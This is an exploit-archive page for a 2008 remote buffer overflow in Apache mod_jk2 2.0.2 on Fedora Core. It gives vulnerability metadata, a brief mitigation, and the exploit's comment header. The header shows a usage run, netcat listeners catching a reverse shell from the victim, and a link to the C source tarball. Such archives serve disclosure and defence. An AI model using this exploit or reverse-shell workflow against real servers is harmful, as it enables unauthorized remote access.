header-logo
Suggest Exploit
vendor:
Tomcat Connectors
by:
INetCop Security
9.3
CVSS
HIGH
Remote Buffer Overflow
119
CWE
Product Name: Tomcat Connectors
Affected Version From: Apache/2.0.53 (Unix) mod_jk2/2.0.2
Affected Version To: Apache/2.0.53 (Unix) mod_jk2/2.0.2
Patch Exists: YES
Related CWE: CVE-2008-2370
CPE: a:apache:tomcat_connectors:jk2-2.0.2
Metasploit: https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2010-0602/https://www.rapid7.com/db/vulnerabilities/suse-cve-2008-2938/https://www.rapid7.com/db/vulnerabilities/centos_linux-cve-2008-2938/https://www.rapid7.com/db/vulnerabilities/apple-osx-tomcat-cve-2008-2938/https://www.rapid7.com/db/vulnerabilities/vmsa-2010-0005-cve-2008-2370/https://www.rapid7.com/db/vulnerabilities/vmsa-2009-0016-5-update-apache-tomcat-version-cve-2008-2370/https://www.rapid7.com/db/vulnerabilities/apple-osx-tomcat-cve-2008-2370/https://www.rapid7.com/db/vulnerabilities/vmsa-2009-0002-cve-2008-2370/https://www.rapid7.com/db/vulnerabilities/suse-cve-2008-2370/https://www.rapid7.com/db/vulnerabilities/f5-big-ip-cve-2008-2370/https://www.rapid7.com/db/vulnerabilities/apache-tomcat-cve-2008-2370/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2008-0648/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2008-0864/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2008-0877/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2008-1007/https://www.rapid7.com/db/vulnerabilities/centos_linux-cve-2008-2370/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2008-0862/
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux
2008

Fedora Core 6,7,8 (exec-shield) based Apache Tomcat Connector jk2-2.0.2(mod_jk2) remote overflow exploit

This exploit targets Apache Tomcat Connector jk2-2.0.2(mod_jk2) on Fedora Core 6,7,8 (exec-shield) based systems. It allows an attacker to gain remote access to the target system by sending a specially crafted request to the vulnerable server. The exploit is available in the form of a tarball containing a C source code file.

Mitigation:

Upgrade to the latest version of Apache Tomcat Connector jk2-2.0.2(mod_jk2) and apply the latest security patches.
Source

Exploit-DB raw data:

/*
**
** Fedora Core 6,7,8 (exec-shield) based
** Apache Tomcat Connector jk2-2.0.2(mod_jk2) remote overflow exploit
** by INetCop Security
**
** Advanced exploitation in exec-shield (Fedora Core case study)
** URL: http://www.milw0rm.com/papers/151
**
** IOActive Security Advisory:
** http://www.securityfocus.com/archive/1/487983
**
** Heretic2(heretic2x@gmail.com)'s exploit (Win32):
** http://www.milw0rm.com/exploits/5330
**
** --
** exploit by INetCop Security.
*/
/*
** --
** $ ./0x82-apache-mod_jk2 61.xx.xx.20 80 61.xx.xx.30
**
**  Fedora Core release 6 (exec-shield) based
**  Apache Tomcat Connector (mod_jk2) remote overflow exploit
**  Target Version: Apache/2.0.53 (Unix) mod_jk2/2.0.2
**  by INetCop Security
**
**  + make socket
**  + make exploit payload
**  + try connected 61.42.25.22:80
**  + exploit send!
**  * attacker host, check it up, now! :-D
**
** $
** --
**
** attacker's server port 56789: -- 
** $ nc -l -p 56789 -vv
** listening on [any] 56789 ...
** 61.xx.xx.20: inverse host lookup failed: Unknown host
** connect to [61.xx.xx.30] from (UNKNOWN) [61.xx.xx.20] 47576
** id
** --
**
** attacker's server port 5678: --
** $ nc -l -p 5678 -vv
** listening on [any] 5678 ...
** 61.xx.xx.20: inverse host lookup failed: Unknown host
** connect to [61.xx.xx.30] from (UNKNOWN) [61.xx.xx.20] 52452
** uid=99(nobody) gid=4294967295 groups=4294967295 context=root:system_r:unconfined_t:s0-s0:c0.c1023
** --
**
*/

https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/5386.tar.gz (2008-x2_fc6f7f8.tar.gz)

# milw0rm.com [2008-04-06]

Navigation

Suggest Exploit

Services By CQR